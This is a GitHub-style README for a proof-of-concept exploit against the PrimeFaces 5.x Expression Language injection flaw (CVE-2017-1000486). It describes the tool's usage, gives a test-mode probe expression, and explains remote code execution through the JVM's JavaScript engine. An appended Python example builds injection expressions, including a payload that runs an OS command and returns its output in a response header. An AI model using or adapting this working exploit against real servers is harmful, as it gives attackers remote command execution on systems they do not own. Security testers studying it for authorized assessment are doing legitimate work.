Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486)
Latest commit a1dfbd1 Jun 4, 2019
Files in the repository (name, last commit message, commit date):

  README.md
  payload.js      adding example payload    Nov 2, 2018
  primefaces.py   Python3 is the future     Jun 4, 2019
  sleep.js

CVE-2017-1000486

Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486), an Expression Language (EL) injection vulnerability that can be used to gain remote code execution (RCE) on a target.

Vulnerability description

You can find an excellent description of the vulnerability on the Minded Security blog.

Usage

The exploit provides a --help option that lists all parameters:

./primefaces.py --help

PrimeFaces 5.x EL injection exploit (CVE-2017-1000486) by MOGWAI LABS
=====================================================================

usage: primefaces.py [-h] [-t] [-e EXTENSION] url [payload]

PrimeFaces 5.x EL injection exploit

positional arguments:
  url                   The target URL (http/https)
  payload               File with the JavaScript (Rhino/Nashorn) code to
                        execute or OS command

optional arguments:
  -h, --help            show this help message and exit
  -t, --test            Test mode (off by default)
  -e EXTENSION, --extension EXTENSION
                        Extension of the target (xhtml, jsf)

The exploit provides a simple test mode (-t parameter) that verifies whether a target is actually vulnerable. It sends the following EL expression to the target; if the expression is evaluated, it adds an extra header field to the HTTP response, and the exploit then checks for that header. Keep in mind that a reverse proxy or WAF that strips unknown response headers makes a vulnerable target look clean, so a missing header is not proof that the target is safe; the sleep.js payload described below gives a timing-based second opinion.

${facesContext.getExternalContext().setResponseHeader("MOGWAILABS","CHKCHK")}

Actual exploitation works by invoking the JavaScript interpreter bundled with the Java VM (Rhino on Java 6/7, Nashorn on Java 8) from the injected EL expression. The script runs with full access to the Java class library, so arbitrary Java code, including process execution, can be called from JavaScript.

The exploit provides two example payloads:

  • payload.js (Execute an OS command)
  • sleep.js (Sleep for 4 seconds, causing a delay of the response)

Please note that neither example returns the output of the command; confirm execution through the response delay (sleep.js) or through the command's side effects.
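The following Python example is added here and is not the repository's primefaces.py. It builds the two kinds of EL expression described above (the test-mode header marker, and a JavaScript payload handed to the JVM's bundled script engine) and checks a response for the marker. It also goes one step beyond the bundled payloads with a constructed Nashorn/Rhino payload that returns the command's output in a response header, which payload.js and sleep.js do not do. The exact form of the ScriptEngineManager expression, the payload text, and the X-Cmd-Output header name are this example's own assumptions; how the expression is delivered to the target is what primefaces.py and the Minded Security write-up cover, and it is not repeated here.

```python
"""
Build the EL expressions used by the test mode and by JavaScript-based
exploitation of CVE-2017-1000486, and check a response for the marker header.
Added example, not the repository's code.  Assumptions: the form of the
ScriptEngineManager expression, the CAPTURE_OUTPUT_JS payload and the
X-Cmd-Output header name are the example author's choices for illustration.
Delivery of the expression to the target is left to primefaces.py.
"""

# Constructed Nashorn/Rhino payload: run a command and hand its output back in
# a response header.  `java` and `javax` are the package globals both engines
# expose; FacesContext is request-bound, so the header lands on this response.
CAPTURE_OUTPUT_JS = r"""
var proc = new java.lang.ProcessBuilder("/bin/sh", "-c", "id")
               .redirectErrorStream(true).start();
var scanner = new java.util.Scanner(proc.getInputStream()).useDelimiter("\\A");
var output = scanner.hasNext() ? scanner.next() : "";
proc.waitFor();
/* header values must not contain line breaks */
var ext = javax.faces.context.FacesContext.getCurrentInstance().getExternalContext();
ext.setResponseHeader("X-Cmd-Output", String(output).replace(/\r?\n/g, " ").trim());
""".strip()


def el_string_literal(text):
    """Quote text as an EL double-quoted string literal; only \\ and " need escaping."""
    escaped = text.replace("\\", "\\\\").replace('"', '\\"')
    return '"' + escaped + '"'


def header_marker_expression(name="MOGWAILABS", value="CHKCHK"):
    """The README's test-mode probe.  The marker is configurable so a tester can
    pick a header name/value that is not already signatured."""
    return "${facesContext.getExternalContext().setResponseHeader(%s,%s)}" % (
        el_string_literal(name), el_string_literal(value))


def wrap_js_in_el(js_source):
    """Wrap JavaScript in an EL expression that passes it to the JVM's bundled
    JavaScript engine (Nashorn on Java 8, Rhino on Java 6/7).  Assumed form."""
    return ('${"".getClass().forName("javax.script.ScriptEngineManager")'
            '.newInstance().getEngineByName("JavaScript").eval(%s)}'
            % el_string_literal(js_source))


def header_marker_present(headers, name="MOGWAILABS", value="CHKCHK"):
    """True if the response carries the marker header (header names are
    case-insensitive, values are compared exactly after trimming)."""
    return any(k.lower() == name.lower() and v.strip() == value
               for k, v in headers.items())


def command_output(headers, name="X-Cmd-Output"):
    """Return the output header set by CAPTURE_OUTPUT_JS, or None if absent."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return None


if __name__ == "__main__":
    print(header_marker_expression())
    print(wrap_js_in_el(CAPTURE_OUTPUT_JS))
    # Constructed response headers, as the test mode would see them.
    sample = {"Content-Type": "text/plain", "mogwailabs": "CHKCHK"}
    print("marker present:", header_marker_present(sample))
```

Run it with python3 to print both expressions. Servlet containers cap header sizes, so long command output will be truncated or rejected; keep commands short or write the output to a file the script can page through in later requests.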
